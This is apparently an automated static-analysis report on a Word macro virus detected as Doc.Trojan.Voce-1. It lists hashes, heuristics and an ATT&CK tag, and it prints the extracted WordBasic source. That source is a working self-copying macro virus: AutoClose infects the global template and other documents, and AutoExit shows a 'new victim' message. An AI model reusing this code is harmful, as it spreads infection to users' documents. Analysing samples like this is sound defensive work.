Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7576b43cb1141238…

MALICIOUS

Office (OLE)

31.0 KB Created: 1998-01-01 00:54:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b56272a080b6b6821ba3cb72277977d5 SHA-1: f1d777e8e5ba056f348eb7e9473dd0f009b1bc69 SHA-256: 7576b43cb1141238721a0ee15b93422a1f674d2ff39532c272db11aac54e345a
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic macros, specifically an AutoClose macro, which is designed to infect other documents by copying itself. The macro attempts to verify if it has already infected the victim document before proceeding. The presence of AutoClose and AutoExit macros, along with ClamAV detections, strongly suggests malicious intent related to macro-based malware.

Heuristics 4

  • ClamAV: Doc.Trojan.Voce-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Voce-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2107 bytes
SHA-256: 9b7418e2f4b9de38897865ae3a4e39d30a1c068c02052ac2ceba130da2c2fff0
Detection
ClamAV: Doc.Trojan.Voce-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"

Public Sub MAIN()
    Infectar
End Sub

Private Sub Infectar()
Dim Infectado
Infectado = VerificaVitima(0)
If Infectado = 0 Then
    WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoClose", "Global:AutoClose", 1
    WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoExit", "Global:AutoExit", 1
Else
    Infectado = VerificaVitima(1)
    If Infectado = 0 Then
        WordBasic.FileSaveAs Format:=1
        WordBasic.MacroCopy "Global:AutoClose", WordBasic.[WindowName$]() + ":AutoClose", 1
        WordBasic.MacroCopy "Global:AutoExit", WordBasic.[WindowName$]() + ":AutoExit", 1
    End If
End If
End Sub

Private Function VerificaVitima(Contexto)
Dim QtdadeMacros
Dim Infectado
Dim MAP0997
Dim i
    QtdadeMacros = WordBasic.CountMacros(Contexto)
    Infectado = 0
    MAP0997 = 0
    If QtdadeMacros > 0 Then
        For i = 1 To QtdadeMacros
            If WordBasic.[MacroName$](i, Contexto) = "AutoClose" Or MAP0997 = 1 Then
                MAP0997 = 1
                If WordBasic.[MacroName$](i, Contexto) = "AutoExit" Then
                    Infectado = 1
                End If
            End If
        Next
    End If
    VerificaVitima = Infectado
End Function

Attribute VB_Name = "AutoExit"

Public Sub MAIN()
    Mensagem
End Sub

Private Sub Mensagem()
Dim Atraso
Dim fim
    If (WordBasic.Day(WordBasic.Now()) = 28 And WordBasic.Month(WordBasic.Now()) = 7) Then
        WordBasic.MsgBox "Parabéns para mim! ", "É meu aniversário", -8
        Atraso = 3
    Else
        WordBasic.MsgBox "Fechando 2807M! ", "Nova Vítima", -8
        Atraso = 1
    End If
    fim = WordBasic.Second(WordBasic.Now()) + Atraso
    While WordBasic.Second(WordBasic.Now()) <> fim
    Wend
End Sub

Attribute VB_Name = "NewMacros"